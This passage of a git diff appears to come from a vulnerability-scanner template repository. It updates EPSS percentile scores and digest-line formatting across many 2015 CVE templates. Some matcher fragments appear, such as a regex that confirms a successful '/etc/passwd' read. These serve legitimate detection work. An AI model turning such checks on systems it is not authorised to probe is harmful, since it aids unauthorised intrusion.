490a00463044022071f71331e80036a1e8477f0f6a7de6d9f12e10422ab324b9bb2debe17bcccccb0220373044b153107c4578f8e500bc17ba7901f7677db70116949d0b7b7cb25853f7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index a75ff6cfb6..1ebcf2ad91 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-1000005 cwe-id: CWE-22 epss-score: 0.05243 - epss-percentile: 0.9216 + epss-percentile: 0.92163 cpe: cpe:2.3:a:candidate-application-form_project:candidate-application-form:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e72a279b9251a1beeb8ab94364f2f1784dcc36f39b35ec8d90487b9afdff81f60220713c860db4ad4325e392aba18c2022ba2cfc206bc9157ed0a3f4d08e721daa46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e72a279b9251a1beeb8ab94364f2f1784dcc36f39b35ec8d90487b9afdff81f60220713c860db4ad4325e392aba18c2022ba2cfc206bc9157ed0a3f4d08e721daa46:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml index d43fe9df8a..f830971469 100644 --- a/http/cves/2015/CVE-2015-1000010.yaml +++ b/http/cves/2015/CVE-2015-1000010.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-1000010 cwe-id: CWE-284 epss-score: 0.03171 - epss-percentile: 0.90051 + epss-percentile: 0.90057 cpe: cpe:2.3:a:simple-image-manipulator_project:simple-image-manipulator:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022039c7f6a685d7be17f38e03aa9ff5c7f49604a72c3033696089ab79cd6549212a022100a35ffc88ed4a8391774397e52ea44a46f18b56420d2a535349e9db2abd9770da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022039c7f6a685d7be17f38e03aa9ff5c7f49604a72c3033696089ab79cd6549212a022100a35ffc88ed4a8391774397e52ea44a46f18b56420d2a535349e9db2abd9770da:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index 5d99288e2f..d9801cf4e6 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-1000012 cwe-id: CWE-200 epss-score: 0.00773 - epss-percentile: 0.79327 + epss-percentile: 0.79336 cpe: cpe:2.3:a:mypixs_project:mypixs:0.3:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100db49ffcdb87fbefdba424969e766a085661d562d0c0bfd761e4e3635b5a1fbd7022100f72708d60d16adb2a965d6e978ad6eed5c166310ff4d9c7d56e6977e70323138:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100db49ffcdb87fbefdba424969e766a085661d562d0c0bfd761e4e3635b5a1fbd7022100f72708d60d16adb2a965d6e978ad6eed5c166310ff4d9c7d56e6977e70323138:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index de1410b8ca..0bf78eb9db 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-1427 cwe-id: CWE-284 epss-score: 0.8674 - epss-percentile: 0.98247 + epss-percentile: 0.9825 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -62,4 +62,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dd64970f369270bcd66830906869421edc8be28f499bf3f9062a1adc385ee94902202928f34bf94b998aad0d3bede5a414a5e4b16a89f8946393b58785e522dbd095:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100dd64970f369270bcd66830906869421edc8be28f499bf3f9062a1adc385ee94902202928f34bf94b998aad0d3bede5a414a5e4b16a89f8946393b58785e522dbd095:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index 4da93fce0a..1433cf0621 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-1503 cwe-id: CWE-22 epss-score: 0.93087 - epss-percentile: 0.98772 + epss-percentile: 0.98773 cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220529e66e005ac896b9746c2903be61c6e7c52e0246b465e4052d5767215fefc48022100fe7984e4cd83461627e6b01032859d28ad644c6f9bc1ba3df8a04b8816c3cbd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220529e66e005ac896b9746c2903be61c6e7c52e0246b465e4052d5767215fefc48022100fe7984e4cd83461627e6b01032859d28ad644c6f9bc1ba3df8a04b8816c3cbd5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index 0975b6eb41..83410a56ab 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-1579 cwe-id: CWE-22 epss-score: 0.92959 - epss-percentile: 0.98755 + epss-percentile: 0.98756 cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:* metadata: max-request: 2 @@ -51,4 +51,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ac51a82fbfafeefc721e4752f8f2c7c1a937a1783ff10483a82c8cfb0dbf5fcf022100a5655bd648b0c2243aef56caaa2488eac323a1537d6a679174d262945996e36f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ac51a82fbfafeefc721e4752f8f2c7c1a937a1783ff10483a82c8cfb0dbf5fcf022100a5655bd648b0c2243aef56caaa2488eac323a1537d6a679174d262945996e36f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index 96ec50ff0e..a395003f47 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-1880 cwe-id: CWE-79 epss-score: 0.00201 - epss-percentile: 0.57883 + epss-percentile: 0.57902 cpe: cpe:2.3:o:fortinet:fortios:5.2.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220402e33a5aa8058672223b395aef9a430dbc5b72a8520440a5848306f11648a9d0220779404cb56081d8fdff94100637d2871319c680e95836c5bdd38c786ddc3a58d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220402e33a5aa8058672223b395aef9a430dbc5b72a8520440a5848306f11648a9d0220779404cb56081d8fdff94100637d2871319c680e95836c5bdd38c786ddc3a58d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index 3dfae3247f..bc316200a6 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2015-2067 cwe-id: CWE-22 epss-score: 0.01338 - epss-percentile: 0.84617 + epss-percentile: 0.84626 cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009e46fab9a00671019e99b28f9e086482caf3a5fd359bbaeba5313a28958a1009022100a708bde3a8cfcac9c7f2afefbeca2038d8e3aee3bc6afda55270e20bd0342e3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221009e46fab9a00671019e99b28f9e086482caf3a5fd359bbaeba5313a28958a1009022100a708bde3a8cfcac9c7f2afefbeca2038d8e3aee3bc6afda55270e20bd0342e3b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index 58c7145e47..b4588dc0ce 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2015-2068 cwe-id: CWE-79 epss-score: 0.00146 - epss-percentile: 0.50325 + epss-percentile: 0.50345 cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: verified: true @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220704a49da41784471902efc1daed17a27ca529b0a380f1613243c7e5d56204ccc022100e78f54f51d90d305456716ea5886c7d3137756ef4dde1f547b158e1c0fc224d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220704a49da41784471902efc1daed17a27ca529b0a380f1613243c7e5d56204ccc022100e78f54f51d90d305456716ea5886c7d3137756ef4dde1f547b158e1c0fc224d3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index b059e6176e..d8f97bc26d 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-2080 cwe-id: CWE-200 epss-score: 0.95465 - epss-percentile: 0.99165 + epss-percentile: 0.99167 cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 400 -# digest: 4a0a0047304502210091d71659c77437196bfaa8fda5ece48aae5e4e735b91138cf381aa7746bbcb9102204d7f5c1af4309fbf143e96b4e354683c183ac067016d08f0e9fe6fc0f0c38950:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210091d71659c77437196bfaa8fda5ece48aae5e4e735b91138cf381aa7746bbcb9102204d7f5c1af4309fbf143e96b4e354683c183ac067016d08f0e9fe6fc0f0c38950:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index 96b91857f4..7dfd75c684 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-2166 cwe-id: CWE-22 epss-score: 0.23272 - epss-percentile: 0.96017 + epss-percentile: 0.96021 cpe: cpe:2.3:a:ericsson:drutt_mobile_service_delivery_platform:4.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b2d0c247e6ba7fe76b7f244b2fb0c424a7443df0879d2b9f5b100f4dc636e1e702205757d520ec8a536c82bb40d21026c1311123457ab469b3c189ef5e379e822950:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b2d0c247e6ba7fe76b7f244b2fb0c424a7443df0879d2b9f5b100f4dc636e1e702205757d520ec8a536c82bb40d21026c1311123457ab469b3c189ef5e379e822950:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index 19fb2e2911..50d00860b6 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-2196 cwe-id: CWE-89 epss-score: 0.0093 - epss-percentile: 0.81281 + epss-percentile: 0.81291 cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:* metadata: verified: true @@ -42,4 +42,5 @@ http: - 'status_code == 200' - 'contains(body, "{\"status\":true,\"data\"")' condition: and -# digest: 490a0046304402204370b3d2856b8275559185518e728f708e68c27fa6d4f020b54926268328596b02205e03fb443a376e20dda43c5877a5cb445f98484c267df3dd28b060d3dbe0272a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204370b3d2856b8275559185518e728f708e68c27fa6d4f020b54926268328596b02205e03fb443a376e20dda43c5877a5cb445f98484c267df3dd28b060d3dbe0272a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index f8c09218fc..94cc577c24 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-2755 cwe-id: CWE-352 epss-score: 0.02569 - epss-percentile: 0.8908 + epss-percentile: 0.89088 cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -55,4 +55,5 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "ab-google-map-travel")' condition: and -# digest: 4a0a00473045022052e413f12e15c2c97ad53e4d5b83e8c8b6cca6f3a130268627e195d48f87e41102210095e370dc01497ba4a28993ac34e43f2a09a795937c85bdd3b5ef2f8dde1a1265:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022052e413f12e15c2c97ad53e4d5b83e8c8b6cca6f3a130268627e195d48f87e41102210095e370dc01497ba4a28993ac34e43f2a09a795937c85bdd3b5ef2f8dde1a1265:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index f5a7f961ea..abb607cebd 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-2807 cwe-id: CWE-79 epss-score: 0.00665 - epss-percentile: 0.77454 + epss-percentile: 0.77466 cpe: cpe:2.3:a:documentcloud:navis_documentcloud:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -49,4 +49,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402207f8c737e3b484a543c4e75117a79280d460529697acea75c4a679e8932969a1802207b6c6a3520b5ccd1b07f2a6ceb489eec279f30b0c043d09901f41935863ae09b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207f8c737e3b484a543c4e75117a79280d460529697acea75c4a679e8932969a1802207b6c6a3520b5ccd1b07f2a6ceb489eec279f30b0c043d09901f41935863ae09b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index 9eff6d4901..ffa4415bf9 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-2863 cwe-id: CWE-601 epss-score: 0.00626 - epss-percentile: 0.7668 + epss-percentile: 0.76695 cpe: cpe:2.3:a:kaseya:virtual_system_administrator:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -38,4 +38,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 -# digest: 4a0a004730450220753b0ec3aac2facd0c208439ce1796471b399df69a3a940e61da4153b061024c022100ebceed6888e75e326ea613e457406f391c9239e327781c86f950252bc27e5e09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220753b0ec3aac2facd0c208439ce1796471b399df69a3a940e61da4153b061024c022100ebceed6888e75e326ea613e457406f391c9239e327781c86f950252bc27e5e09:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index 50c1b1263b..65c69f4b97 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-2996 cwe-id: CWE-22 epss-score: 0.77754 - epss-percentile: 0.97884 + epss-percentile: 0.97889 cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100daca7ba49520acaa3916baf2088091125280782c2deb61680865e7342387e6470220356cd002c161ca1d7ae0a9890bbcc33bb7678c691893bc518f11a78558015f6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100daca7ba49520acaa3916baf2088091125280782c2deb61680865e7342387e6470220356cd002c161ca1d7ae0a9890bbcc33bb7678c691893bc518f11a78558015f6c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index fb4bbb8129..46c2490806 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-3035 cwe-id: CWE-22 epss-score: 0.58993 - epss-percentile: 0.97378 + epss-percentile: 0.97382 cpe: cpe:2.3:o:tp-link:tl-wr841n_\(9.0\)_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402205615efdf2ff4d7d5454512402d1749db7886bd1ee838209c7d96923ca4c7466102202c6e1963b7eae9c5f3da8c46c7d2ac04cfd3d38c09748246ffe9ea5c5e2dde69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205615efdf2ff4d7d5454512402d1749db7886bd1ee838209c7d96923ca4c7466102202c6e1963b7eae9c5f3da8c46c7d2ac04cfd3d38c09748246ffe9ea5c5e2dde69:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index 366525883c..27613d7239 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-3224 cwe-id: CWE-284 epss-score: 0.93857 - epss-percentile: 0.98873 + epss-percentile: 0.98876 cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -52,4 +52,5 @@ http: - data-session-id= case-insensitive: true condition: or -# digest: 4a0a00473045022059aeffb9c6ef380a91e74139f62fcaabe00fcc1ac6812ac2e194ad7b69b28b920221009d03ce232b21e340a55b07d44889ed5987ac293bf658f700efd21c939d02a7d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022059aeffb9c6ef380a91e74139f62fcaabe00fcc1ac6812ac2e194ad7b69b28b920221009d03ce232b21e340a55b07d44889ed5987ac293bf658f700efd21c939d02a7d9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index 6daccecacc..40e91fe062 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-3337 cwe-id: CWE-22 epss-score: 0.96596 - epss-percentile: 0.99491 + epss-percentile: 0.99493 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022021c21455d9a15f140d39b79773d466acc38c6342032f6ab09c3b086acc36a90d022100981a60977858f5903f293ed3b9aa9b46fe8afa19e302b89c75b56b0aa3477c3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022021c21455d9a15f140d39b79773d466acc38c6342032f6ab09c3b086acc36a90d022100981a60977858f5903f293ed3b9aa9b46fe8afa19e302b89c75b56b0aa3477c3d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index 16973daa0b..c4a8085d4c 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-3648 cwe-id: CWE-22 epss-score: 0.02644 - epss-percentile: 0.89222 + epss-percentile: 0.8923 cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e97da28129ac64b5f78ec534b2536c9a1b4db2a2961bef009b261983cdbe1a000220735a847b7cd1d452a5589820f14c23455b4f25742e0df9e84a546c0d173caeab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e97da28129ac64b5f78ec534b2536c9a1b4db2a2961bef009b261983cdbe1a000220735a847b7cd1d452a5589820f14c23455b4f25742e0df9e84a546c0d173caeab:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index 73b1ece9b6..add2dd9e2c 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-3897 cwe-id: CWE-22 epss-score: 0.83225 - epss-percentile: 0.98081 + epss-percentile: 0.98084 cpe: cpe:2.3:a:bonitasoft:bonita_bpm_portal:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -47,4 +47,5 @@ http: - type: regex regex: - "root:[x*]:0:0:" -# digest: 4a0a0047304502202c537db4deeabb2858cebec29a66c719e23e2cc91e28f4376eccb7deb7b52567022100e400a8329eece4fae0ba25a3cd419ac070fb46f8df6742d4981f682a2746b5d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202c537db4deeabb2858cebec29a66c719e23e2cc91e28f4376eccb7deb7b52567022100e400a8329eece4fae0ba25a3cd419ac070fb46f8df6742d4981f682a2746b5d2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index fbafebcd39..ec789912ea 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4050 cwe-id: CWE-284 epss-score: 0.00847 - epss-percentile: 0.80306 + epss-percentile: 0.80314 cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200fdaa60e58a3bb03e481caf486d722078fa3a874b42f6085b34e0ed0cc23de26022100b490d21a025194917a6a1c3b3aa9e269f9c8ff2eab6dacd54b9f52a2a774090e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200fdaa60e58a3bb03e481caf486d722078fa3a874b42f6085b34e0ed0cc23de26022100b490d21a025194917a6a1c3b3aa9e269f9c8ff2eab6dacd54b9f52a2a774090e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index 5c9c4ba718..e03b04371a 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-4062 cwe-id: CWE-89 epss-score: 0.02803 - epss-percentile: 0.89514 + epss-percentile: 0.89523 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -50,4 +50,5 @@ http: - 'status_code == 200' - 'contains(body_2, "newstatpress_page_nsp_search")' condition: and -# digest: 490a004630440220135258595ae8f09800c454e6d6cbf3fe9e7c76090a52b1599f90838baa333e830220694d4d36b66cf444e21bc630234aae594007922facc17c15c929440165216492:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220135258595ae8f09800c454e6d6cbf3fe9e7c76090a52b1599f90838baa333e830220694d4d36b66cf444e21bc630234aae594007922facc17c15c929440165216492:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index 1fba17c5d8..1636bd69af 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4063 cwe-id: CWE-79 epss-score: 0.04016 - epss-percentile: 0.91066 + epss-percentile: 0.91073 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -48,4 +48,5 @@ http: - 'status_code_2 == 200' - "contains(body_2, '') && contains(body_2, 'newstatpress')" condition: and -# digest: 4b0a00483046022100df1edb2338068ee5872fede0d23d43b9dc9881db461985e2f80cb063d3442e64022100ee2ab5898665d09e408545ca0dd2a7631a9a7dbf587153443deff7dbdc96d62c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100df1edb2338068ee5872fede0d23d43b9dc9881db461985e2f80cb063d3442e64022100ee2ab5898665d09e408545ca0dd2a7631a9a7dbf587153443deff7dbdc96d62c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index 1965038b50..e661bde35d 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-4074 cwe-id: CWE-22 epss-score: 0.00598 - epss-percentile: 0.76073 + epss-percentile: 0.76085 cpe: cpe:2.3:a:helpdesk_pro_project:helpdesk_pro:*:*:*:*:*:joomla\!:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402201ae38371fd9d75858c8f7b644db0602845b74226347f0fd28e936305913a60f602203cc3b4b81af502e1217906283fd2d1c1155928be30ad1c977e27762304fb187d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402201ae38371fd9d75858c8f7b644db0602845b74226347f0fd28e936305913a60f602203cc3b4b81af502e1217906283fd2d1c1155928be30ad1c977e27762304fb187d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index 037edb4fd0..ad27732d55 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4127 cwe-id: CWE-79 epss-score: 0.0034 - epss-percentile: 0.68294 + epss-percentile: 0.6831 cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210084c2d42efe718b56c27c4c1b96dd56af3f11b1193ec21f4b230998a538a54453022100ac8b38e2a722624d470d125c03cf71d81aa6591d737097d17d0de44b596af613:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210084c2d42efe718b56c27c4c1b96dd56af3f11b1193ec21f4b230998a538a54453022100ac8b38e2a722624d470d125c03cf71d81aa6591d737097d17d0de44b596af613:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index 4f2c1465e9..5d352adea7 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4414 cwe-id: CWE-22 epss-score: 0.11221 - epss-percentile: 0.94567 + epss-percentile: 0.94572 cpe: cpe:2.3:a:se_html5_album_audio_player_project:se_html5_album_audio_player:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dc8761203ed1183935c459ab355e1c4ea1167aae3ae05fa7338f17ac1c96ed4402202b31e0e7beae18e30ebf0e7acfce097daceb61de5b2065078d558b75fe021b27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100dc8761203ed1183935c459ab355e1c4ea1167aae3ae05fa7338f17ac1c96ed4402202b31e0e7beae18e30ebf0e7acfce097daceb61de5b2065078d558b75fe021b27:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index a93f373746..c15cfbf875 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4632 cwe-id: CWE-22 epss-score: 0.0282 - epss-percentile: 0.89542 + epss-percentile: 0.89551 cpe: 